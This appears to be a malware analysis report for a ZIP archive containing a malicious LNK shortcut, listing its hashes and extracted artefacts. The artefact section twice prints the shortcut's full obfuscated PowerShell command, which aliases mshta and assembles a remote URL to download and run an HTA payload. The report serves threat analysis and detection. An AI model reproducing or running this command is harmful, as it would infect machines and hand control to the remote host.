8ad3cd125e6243ed5f018d75a39007f5428805[...]7a1.zip

ZIP Archive
|
MD5: 3698d75a4a1560c0443dd7e8a35beef8
|
Size: 1.28 KB
|
application/zip

Infection Chain

Summary by MalvaGPT

Characteristics

Hash	Hash Value
MD5	3698d75a4a1560c0443dd7e8a35beef8
Sha1	f829f4153c4d252bdaf7a0fec06fc21cf7664636
Sha256	3b92b78c92d21724485a9f72bfd2e7eff5efb05ca9f3b2f5504765f98b2a2af4
Sha384	8520a7bf17a9f745a28172a69b11649ef17f019078be21d59b3a5027380ee3ef86a0d0450f5a77567d9fa4fb52b69ab0
Sha512	5461af02b0cfb82cb691b8faaf8d44cc153992711607bf02bd0b527fec51b8cfc079a99f69599a8874488153dc2ab01a83b705391efbe176390fd5bd1f0e685a
SSDeep	24:Wq5GG0gYcLdfbxEscICvecLnXPZpHtXryIQlSW/umeQgBs6t1qK:x5GG0YLdfbBjCv/3HtmIQllBPP6eK
TLSH	E021EA4829FDE50CC1E6BC7D6CD28A551E082431636F72DD43AD1B4318135A1CF07D88

File Structure

Artefacts

Name0	Value
LNK: Command Execution	powershell.exe -ExecutionPolicy UnRestricted $d='/dphm2-s6Hi48j7:aL9P.t35O1'; &(-join($d[(241-234),(-130+146),(647-630)])) /> (-join($d[(241-234),(-130+146),(647-630)])); /> ^+ (-join($d[(437-433),(241-234),(-241+244),(914-893),(-130+146)])); foreach($C in @((-487+490),(837-816),(-543+564),(-443+445),(-364+379),(876-876),(-835+835),(-508+533),(-601+613),(-792+815),(242-222),(-202+227),(413-395),(-815+823),(407-387),(-579+604),(908-883),(-359+379),(-689+714),(734-711),(235-210),(948-948),(-737+747),(-238+239),(383-370),(830-814),(-693+693),(-423+442),(129-105),(443-437),(703-680),(-649+660),(774-760),(-802+825),(543-538),(-941+952),(-233+256),(-137+148),(-770+775),(-501+523),(-472+495),(-855+875),(130-127),(-677+698),(-267+283))){$g+=$d[$C]}; ^+ $g;

Name0

Value

LNK: Command Execution

8ad3cd125e6243ed5f018d75a39007f542880582db374aefbea96e27088477a1.zip (1.28 KB)

File Structure

Characteristics

No malware configuration were found at this point.

Artefacts

Name0	Value	Location
LNK: Command Execution	powershell.exe -ExecutionPolicy UnRestricted $d='/dphm2-s6Hi48j7:aL9P.t35O1'; &(-join($d[(241-234),(-130+146),(647-630)])) /> (-join($d[(241-234),(-130+146),(647-630)])); /> ^+ (-join($d[(437-433),(241-234),(-241+244),(914-893),(-130+146)])); foreach($C in @((-487+490),(837-816),(-543+564),(-443+445),(-364+379),(876-876),(-835+835),(-508+533),(-601+613),(-792+815),(242-222),(-202+227),(413-395),(-815+823),(407-387),(-579+604),(908-883),(-359+379),(-689+714),(734-711),(235-210),(948-948),(-737+747),(-238+239),(383-370),(830-814),(-693+693),(-423+442),(129-105),(443-437),(703-680),(-649+660),(774-760),(-802+825),(543-538),(-941+952),(-233+256),(-137+148),(-770+775),(-501+523),(-472+495),(-855+875),(130-127),(-677+698),(-267+283))){$g+=$d[$C]}; ^+ $g; Malicious	8ad3cd125e6243ed5f018d75a39007f542880582db374aefbea96e27088477a1.zip > 8ad3cd125e6243ed5f018d75a39007f542880582db374aefbea96e27088477a1.lnk

You must be signed in to post a comment.